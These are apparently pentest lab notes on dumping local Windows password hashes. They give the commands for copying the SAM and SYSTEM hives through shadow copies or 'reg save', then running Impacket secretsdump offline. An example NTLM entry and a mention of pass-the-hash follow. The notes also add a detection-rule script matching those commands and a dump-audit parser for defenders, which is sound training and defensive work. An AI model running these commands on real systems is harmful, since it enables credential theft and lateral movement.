koroc@lab: ~/notes/local_windows_credentials

Local Windows Credentials - SAM

$ educational pentest lab notes · do not use on systems you don't own
Tags: Windows · SAM · VSS · Registry Hives · Impacket

0x01 — Local vs Domain Accounts

Local accounts are stored on the machine itself (in the SAM database), while domain accounts are stored centrally in Active Directory.

This note focuses on local credentials and how to obtain their hashes from the Security Account Manager (SAM) for offline analysis in a lab.

0x02 — Security Account Manager (SAM)

The SAM database stores:

  • Local usernames
  • LM / NTLM password hashes
  • RIDs and related metadata

File locations:

C:\Windows\System32\Config\SAM

C:\Windows\System32\Config\SYSTEM

The SYSTEM hive contains the BootKey used to decrypt the SAM contents.

0x03 — Access the Target

RDP into the Windows machine using the provided lab credentials.

All of the following commands must be run from an elevated (Administrator) command prompt.

0x04 — Method 1: Volume Shadow Copy Service (VSS)

Create a snapshot and copy SAM/SYSTEM from it.

Create a shadow copy of C:\

wmic shadowcopy call create Volume='C:\'

List existing shadow copies

vssadmin list shadows

Look for a path similar to: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Copy SAM and SYSTEM from the shadow copy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SAM C:\Users\Administrator\Desktop\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SYSTEM C:\Users\Administrator\Desktop\system

Transfer both files (sam and system) to your Kali machine (SCP, SMB, etc.).

0x05 — Method 2: Registry Hive Export

Save the live SAM and SYSTEM registry hives directly, without taking a snapshot.

Export SAM and SYSTEM from registry

reg save HKLM\sam C:\Users\Administrator\Desktop\sam-reg
reg save HKLM\system C:\Users\Administrator\Desktop\system-reg

Save path example: C:\Users\Administrator\Desktop\sam-reg, C:\Users\Administrator\Desktop\system-reg

Transfer these files to Kali as well.
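Every step in Methods 1 and 2 runs as a distinct process with a recognisable command line, which is what makes the activity easy to spot in process-creation telemetry. The following is an added detection example written for these notes (not code from the original page); the event layout (host/user/cmdline dicts), hostnames and user names are constructed assumptions standing in for parsed Windows 4688 or Sysmon Event ID 1 records.

```python
"""Detect the SAM/SYSTEM extraction steps from Methods 1 and 2 in
process-creation telemetry.

Added example for these notes, not part of the original. The event
layout, hostnames and user names are constructed assumptions."""
import re
from collections import defaultdict

# One rule per command used above: (name, severity, compiled pattern).
RULES = [
    ("vss_snapshot_create", "medium",
     re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+call\s+create\b", re.I)),
    ("vss_enumerate", "low",
     re.compile(r"\bvssadmin(?:\.exe)?\s+list\s+shadows\b", re.I)),
    ("hive_copy_from_shadow", "high",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\System32\\Config\\(?:SAM|SYSTEM)\b", re.I)),
    ("registry_hive_save", "high",
     re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:sam|system)\b", re.I)),
]

# Either of these means hive content was actually read out; that is the
# point at which snapshot/enumeration stops looking like routine backup work.
HIVE_ACCESS_RULES = {"hive_copy_from_shadow", "registry_hive_save"}

# Constructed sample events: WS01 runs the full Method 1 chain, WS02 runs
# Method 2, WS03 only lists shadow copies and then runs an unrelated process.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"LAB\admin", "cmdline": r"wmic shadowcopy call create Volume='C:\'"},
    {"host": "WS01", "user": r"LAB\admin", "cmdline": "vssadmin list shadows"},
    {"host": "WS01", "user": r"LAB\admin", "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SAM C:\Users\Administrator\Desktop\sam"},
    {"host": "WS01", "user": r"LAB\admin", "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SYSTEM C:\Users\Administrator\Desktop\system"},
    {"host": "WS02", "user": r"LAB\admin", "cmdline": r"reg save HKLM\sam C:\Users\Administrator\Desktop\sam-reg"},
    {"host": "WS02", "user": r"LAB\admin", "cmdline": r"reg save HKLM\system C:\Users\Administrator\Desktop\system-reg"},
    {"host": "WS03", "user": r"LAB\backup", "cmdline": "vssadmin.exe list shadows"},
    {"host": "WS03", "user": r"LAB\backup", "cmdline": r"notepad.exe C:\Users\backup\notes.txt"},
]


def scan(events):
    """Return one finding per (event, rule) match, preserving event order."""
    findings = []
    for ev in events:
        for name, severity, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "rule": name, "severity": severity,
                                 "cmdline": ev["cmdline"]})
    return findings


def triage(events):
    """Group findings per host and decide whether they add up to an alert.

    A host is alerted when a hive-access rule fired; snapshot creation or
    enumeration on its own is kept as context so that backup jobs do not
    page anyone."""
    per_host = defaultdict(set)
    for f in scan(events):
        per_host[f["host"]].add(f["rule"])
    return {
        host: {"rules": sorted(rules), "alert": bool(rules & HIVE_ACCESS_RULES)}
        for host, rules in per_host.items()
    }


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, "ALERT" if verdict["alert"] else "context", verdict["rules"])
```

The split between "context" and "alert" rules is the design choice worth keeping when adapting this to a real SIEM: shadow-copy creation and `vssadmin list shadows` are normal on backup hosts, whereas copying `Config\SAM` out of a snapshot or saving `HKLM\sam` has no routine administrative reason and should fire on its own.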

0x06 — Dump Hashes with Impacket (Kali)

On Kali, use secretsdump.py from the python3-impacket package (the same tool is also installed as the impacket-secretsdump wrapper).

Using raw SAM/SYSTEM files

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
  -sam sam \
  -system system \
  LOCAL

Using registry exports

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
  -sam sam-reg \
  -system system-reg \
  LOCAL

Typical output format:

username:RID:LMHASH:NTHASH:::

The NT hash is the important one for cracking or pass-the-hash.

0x07 — Example Entry

Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::

  • LM hash: often disabled / empty
  • NT hash: used for authentication, cracking, or pass-the-hash
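When a dump like the one above is reviewed in a lab, the useful defensive questions are whether any LM hashes are still present, whether any account has an empty password, and whether several accounts share one NT hash (password reuse). The following parser and audit for the user:RID:LMHASH:NTHASH::: format is an added example written for these notes, not Impacket code; the sample dump is constructed (the Administrator line is the entry shown above, the other accounts and their hashes are made up), and the LM/NT constants for an empty password are the well-known values.

```python
"""Parse and audit secretsdump.py LOCAL output (user:rid:lm:nt:::).

Added example for these notes, not Impacket code. The sample dump is
constructed except for the Administrator entry taken from the note."""
import re
from collections import defaultdict

# Well-known constants: the LM hash stored when LM is disabled/empty, and
# the NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

ENTRY = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)

# Constructed sample: status lines plus four accounts.
SAMPLE_DUMP = """\
[*] Target system bootKey: 0x00000000000000000000000000000000
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
labuser:1001:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
legacy:1002:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""


def parse_dump(text):
    """Return one dict per hash line; status lines ([*] ...) are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid),
                            "lm": lm.lower(), "nt": nt.lower(),
                            "note": WELL_KNOWN_RIDS.get(int(rid), "")})
    return entries


def audit(entries):
    """Flag what a defender cares about in a SAM dump: LM hashes still
    present, accounts with an empty password, and one NT hash shared by
    several accounts (password reuse)."""
    findings = []
    lm_present = sorted(e["user"] for e in entries if e["lm"] != EMPTY_LM)
    if lm_present:
        findings.append(("lm_present", lm_present))
    empty = sorted(e["user"] for e in entries if e["nt"] == EMPTY_NT)
    if empty:
        findings.append(("empty_password", empty))
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(e["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings.append(("nt_reuse", sorted(users)))
    return findings


if __name__ == "__main__":
    parsed = parse_dump(SAMPLE_DUMP)
    for e in parsed:
        print(f"{e['user']:<14} rid={e['rid']:<5} {e['note']}")
    for kind, users in audit(parsed):
        print(kind, users)
```

The reuse check is the one that usually pays off in a lab report: two accounts with the same NT hash share a password, so a weak password on a low-privilege account exposes the privileged one as well, and the dump shows that without cracking anything.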
Legal notice: use these techniques only on systems you own or are explicitly authorized to test. Unauthorized access is illegal and unethical.